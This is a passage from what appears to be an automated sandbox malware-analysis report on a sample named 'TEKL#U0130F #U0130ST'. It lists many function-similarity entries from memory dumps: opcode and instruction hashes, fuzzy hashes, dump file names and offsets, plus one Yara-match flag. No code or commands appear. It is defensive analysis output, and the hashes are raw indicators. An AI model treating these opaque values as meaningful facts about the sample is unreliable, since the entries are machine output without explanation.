• Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
• Instruction ID: ae9a9c53827dec849ed925d95af89bc0b1fd2b6dae332b55441ea5384efd5bae
• Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
• Instruction Fuzzy Hash: 16F06D7220001DBFEF059F94DD80DAF7BBEEB587D8B104168FA00A2160D331DD21ABA0
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8b6c3ea4d35d0e61b5e2666b2a5d287fa03f5884897cf6be6958dcc131fab393
• Instruction ID: a7d730e92831573752ed3320bc19aa5e0f6cfaf1d37bb1c9b4c3f71cbeb40b84
• Opcode Fuzzy Hash: 8b6c3ea4d35d0e61b5e2666b2a5d287fa03f5884897cf6be6958dcc131fab393
• Instruction Fuzzy Hash: 1501853610020DABCF129E94D840EDA7F66FB5CB64F068245FE1966220C332D971EB81
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b9b66997be472e8c648fe2db44126e2cb2cd3278e76687abef97fecebd7f6f8d
• Instruction ID: 0d303c6ba29fb4b958c830dcc8c02080fc70206956772984b6bdc3b1963cbb2c
• Opcode Fuzzy Hash: b9b66997be472e8c648fe2db44126e2cb2cd3278e76687abef97fecebd7f6f8d
• Instruction Fuzzy Hash: 97F024723046415BF71CA69A9C01B223B9AE7C0750FA680EBEB099B2C5EF70DC1193A4
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8b5671b51e8a69e9c81a40ce06d25e39d59b2cde1b53bf0442e9178f71087c6f
• Instruction ID: d7671eecdd0ec1d3a53ad3368a5c14a622ef17edb48f6fbfa4c50769c2dc4fe4
• Opcode Fuzzy Hash: 8b5671b51e8a69e9c81a40ce06d25e39d59b2cde1b53bf0442e9178f71087c6f
• Instruction Fuzzy Hash: C801A470601A86DFF72E972CCD88B7537E4FB50B40F4802E0BA12DBAE6D768D401D610
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
• Instruction ID: 26060f4f47614582841a5b7e17cd46aa29c32ae351e6cbe7e40193d3f9cb637e
• Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
• Instruction Fuzzy Hash: 5EF0E93534191347EB7EAA2D8454B2FA6D5DF90940B1506BC9651CB640DF64D80087A0
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0dc2cb328cd37057d70518108a279a66aed84586c1952b8c2977496399820195
• Instruction ID: f8ba6ea3e8a86fb94dc724acc17fe7d4e78558bf3ac021770dc835db9e749b9d
• Opcode Fuzzy Hash: 0dc2cb328cd37057d70518108a279a66aed84586c1952b8c2977496399820195
• Instruction Fuzzy Hash: 5CF081706053049FC714EF68C441B1BBBE4EF58B10F40469EB898DB390E734E901C756
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
• Instruction ID: 9ce2fdb70ed7305364f887d6d646b631a9c96b40fd5544ef4ccbde53fac82814
• Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
• Instruction Fuzzy Hash: A4F05E32711612DBE7399A4ECC80F17BBA8EFD5E60F5901A9AA049B260C760EC01C7E0
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
• Instruction ID: 3befaf96cb7f6f45641edd8e74b513d3f5d0247676ab71588784cf9b92f3e2e2
• Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
• Instruction Fuzzy Hash: 3DF0E9B2614204AFE728EF25CC01F56B7EDEF99340F1480B9A945D7260FBB0ED11D654
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e54fcfaa34f5fce7f76acc9463e9e40830a275c0dc658a119de1d118c8f74aa3
                                                                                                              • Instruction ID: 115385e495cbc9ca0aff293263dbeeff67e1915bd3c03ca86aa86741a9059c5d
                                                                                                              • Opcode Fuzzy Hash: e54fcfaa34f5fce7f76acc9463e9e40830a275c0dc658a119de1d118c8f74aa3
                                                                                                              • Instruction Fuzzy Hash: 33F03170A012499BCB08EFA9C555B9EB7B4EF18700F104199A955EB395DA74DA01CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: faee54d599c56706886eb3c43ae330fab4d84b37ff2705cd37aaa8e1b0d0b5d3
                                                                                                              • Instruction ID: 04a8109c3f1fe27fb6be058db3a5b2bae91d2df422973e6b38fa311fe499c43c
                                                                                                              • Opcode Fuzzy Hash: faee54d599c56706886eb3c43ae330fab4d84b37ff2705cd37aaa8e1b0d0b5d3
                                                                                                              • Instruction Fuzzy Hash: 4AF0BE319166E19FF73ACB6CC044B21BBD4DB01620F09C9EAD98987902C735D8A0E650
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d19847a54ef7579e57cf818e52d1363e803e676cf54d77d021d9cc3abd3aa285
                                                                                                              • Instruction ID: dd5fc1992178e0595fe6b2f4dd3ea45e414c45b54d0b107fb0b0daece3c6002b
                                                                                                              • Opcode Fuzzy Hash: d19847a54ef7579e57cf818e52d1363e803e676cf54d77d021d9cc3abd3aa285
                                                                                                              • Instruction Fuzzy Hash: BAF0277A419BD096CF336B6C64503D16B65A761160F0B10C9D9A657245C674C793C320
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 818a46b14e066a27e0de681145778feac04d1d3625770e65282ae4e2740bd740
                                                                                                              • Instruction ID: 937dbd865a4a9d351cd7080baf2c1e6fc3902b0189bf41bb15c2e844120e4b72
                                                                                                              • Opcode Fuzzy Hash: 818a46b14e066a27e0de681145778feac04d1d3625770e65282ae4e2740bd740
                                                                                                              • Instruction Fuzzy Hash: B4F0E2715116539FE72A9B1CC1C8B11BFD4DB017A0F09A5EDF92687512C360E880CA50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                              • Instruction ID: 03db498e1e279310374e041e59bfb46b09245f39d6e58d053939ecabbc1724ed
                                                                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                              • Instruction Fuzzy Hash: A4E092723006412BEB26AE598D80F57776EDFD6B14F0400B9B9045E251CBE2DC09C2A4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                              • Instruction ID: 50e92958eb81ce2d8920b0836481bae443b4f7307008130779e9bfaec661ecf6
                                                                                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                              • Instruction Fuzzy Hash: 81F06572154204DFE32D8F49D984F52B7F8EB19364F45C0A5E6099B561E379EC40CBA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                              • Instruction ID: 1cb59b3d6f1db7893efd439e078f1808cf3865b091566280fc54d0bb6ae3dbb9
                                                                                                              • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                              • Instruction Fuzzy Hash: 5EF0A0393043469BDF1EEF19D040AD57BE4EB41350B0040D4F9428B351D731E982CB51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                              • Instruction ID: e34f51e634b5955cdb752100fac92607b8a900f070b0434181a51c3a5baa1e4b
                                                                                                              • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                              • Instruction Fuzzy Hash: 4DE0D832654185ABD73A3A598800B6A77A9DBD07A2F150469E6108B160EB70DC40D7D8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                              • Instruction ID: 981adaa099261dceaae01316af8af338d00e2ad40b8ed765ef58eff4ad4a9cee
                                                                                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                              • Instruction Fuzzy Hash: 59E0DF32A40110BBDF269799CD05F9ABFACDBA4FA1F050095BA00E7090E770EE00D690
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 56c62ff1eda09e1bdf6d44cc4d7fdc403d6bb65d3d6684610e16e318f6b2dfdd
                                                                                                              • Instruction ID: df5b5b946206354c393f7c52451566b8d0a2d0d04488327835fce837b35bb8f7
                                                                                                              • Opcode Fuzzy Hash: 56c62ff1eda09e1bdf6d44cc4d7fdc403d6bb65d3d6684610e16e318f6b2dfdd
                                                                                                              • Instruction Fuzzy Hash: 6FD0C25AB8A05195861A9A1D6CA08A1E72984C3670B1023E8DC98DB781D311C02182B9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 8e3a7f47fa512e9a78e455d2b3becf8ab09be888d18b0f9bfad627d5bfd9efeb
                                                                                                              • Instruction ID: b04da339436a6539c754d4ac2115af3cc098d2bfd6cebe510323a10ce8895b49
                                                                                                              • Opcode Fuzzy Hash: 8e3a7f47fa512e9a78e455d2b3becf8ab09be888d18b0f9bfad627d5bfd9efeb
                                                                                                              • Instruction Fuzzy Hash: 9EE09232100654ABCB26BF29DD01F8A77EAEF607A0F014555B115571A0CB30A910D794
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                              • Instruction ID: edd0d375024a4b70f014865a29119b13600ed9ea9457415e520f205c1ae40889
                                                                                                              • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                              • Instruction Fuzzy Hash: 4EE09231010612DFEB3E6F3AC908B56BBE0FF50B11F148CADA19A025B0C77598C4CB40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                              • Instruction ID: dac8697af0f17600eddb428e212fa6726bf58e8128d9cd583ac148e6fb205996
                                                                                                              • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                              • Instruction Fuzzy Hash: DAE0C2343403058FE719CF19C050B627BB6FFD9A10F28C0A8A9488F205EB32E942CB40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: df99fd37b3cb00d8f4df1e8ce5ac3a1e3116af594855c8c94f362370b0c6dd60
                                                                                                              • Instruction ID: 3b92e9d72bb72667845c8119f61faddc70ed45eb0efb6e782296a9ce4f3bc706
                                                                                                              • Opcode Fuzzy Hash: df99fd37b3cb00d8f4df1e8ce5ac3a1e3116af594855c8c94f362370b0c6dd60
                                                                                                              • Instruction Fuzzy Hash: 05D02B324810626ACF7EF2197C04F933E5DDB50321F0148E4F51992014D765CC8197C4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                              • Instruction ID: 809eb2ec5f99fc549d8f0d48b82a2041605494168bc2848bbf36892508bdb0d9
                                                                                                              • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                              • Instruction Fuzzy Hash: 88E08C31041A10EFDF3A2F25DD00F5176E1FB94B50F214AE9F085460A487B4A892CA45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f1d448d5108ef4a386e616a371e0fd979a8d0495776eb7853e19eb66cf667e44
                                                                                                              • Instruction ID: b78c149b0021657920abdde6d4808ffed384bbfb67cdc35e6c26f2f7e68073ea
                                                                                                              • Opcode Fuzzy Hash: f1d448d5108ef4a386e616a371e0fd979a8d0495776eb7853e19eb66cf667e44
                                                                                                              • Instruction Fuzzy Hash: 03E08C321005606BCB16FB5DED00F4A73AAEFA42A0F004161B151872A0CB30AD00E7A4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                              • Instruction ID: dedc2acf0fd73581a7b81848eaf17a9459d8b8cfe0f202022c744400612d90af
                                                                                                              • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                              • Instruction Fuzzy Hash: 32E08633511A1487C728EE18D515B7277A4EF45720F09463EA62347790C634E544C794
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                              • Instruction ID: 4b18fe569ffd0084204b606badf32b46024f8c41dff23ad67741b82241e92b4c
                                                                                                              • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                              • Instruction Fuzzy Hash: 81D05E36511A50AFC7369F1BEA00D13BBF9FBC5B50705067EA54583A20C774A806CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                              • Instruction ID: 1c3daa6bbbab952d4d9ce00c5850050e01ceeb8b0fa2c9df2c47d041fcfef2f5
                                                                                                              • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                              • Instruction Fuzzy Hash: A0D0A932604620ABDB76AA1CFC00FD333E8BB88760F060499B108C7260C3A0AC81CA84
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                              • Instruction ID: a7f649b256ee07826bb37314d7b814442cbc1c79fc65d8d3abbd38c679fb4913
                                                                                                              • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                              • Instruction Fuzzy Hash: F8E0EC359507849BDF5ADF59C680F9ABBF5FB94B40F150094A5485B670C774E900CB40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                              • Instruction ID: b8cfc745b8e94803bd9c1326c1336b8e985e13e2f61e6a2f6cdc70e28b3c67b9
                                                                                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                              • Instruction Fuzzy Hash: 2BD0223221203093CF2C97666800F63BA05EBC1AD0F2A01AC380AE3900C2148C42C2E0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                              • Instruction ID: 08326afdcf7d94781228588b895dbb202a4de4e14c64ef6e647613eef2a5d9d7
                                                                                                              • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                              • Instruction Fuzzy Hash: 56D012371D064DBBCB119F66DC01F957BA9E764BA0F444020B904875A0C63AE950D584
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9bb981cf1be7f4708736d29d0c55e00b73a7d4f5ea7a2f9ed2eb833130fdb026
                                                                                                              • Instruction ID: 9e922c95c3c4c5ce78d9dc5b9996a251bc2d16f5ef0f80d03385e6f166376832
                                                                                                              • Opcode Fuzzy Hash: 9bb981cf1be7f4708736d29d0c55e00b73a7d4f5ea7a2f9ed2eb833130fdb026
                                                                                                              • Instruction Fuzzy Hash: 44D052306019029BDF2FEB08CA51ABA3EB8EB20681B4000ECEA0192920E328DC018A10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                              • Instruction ID: 38cedfe3edd43bd3e2f68ac0f660b378efb5d8e36f8c56a4e886a96ab4e9ee9c
                                                                                                              • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                              • Instruction Fuzzy Hash: 94D09235216E80CFD76A8B0CC5A4B1573A4FB44B84F8504D0E901CBB22E769D940CA00
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                              • Instruction ID: cadacc29b50c5a8759c001a74e1e98378189a661168be9952c0763390dcdb4ce
                                                                                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                              • Instruction Fuzzy Hash: 71C01232290648AFCB16AB99CD01F027BA9EBA8B80F000061F6048B670C631E820EA84
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                              • Instruction ID: 1870e21cd622607ac4b17ec45d09cf705c9e0b2ab96def252f64b5bf2ee60483
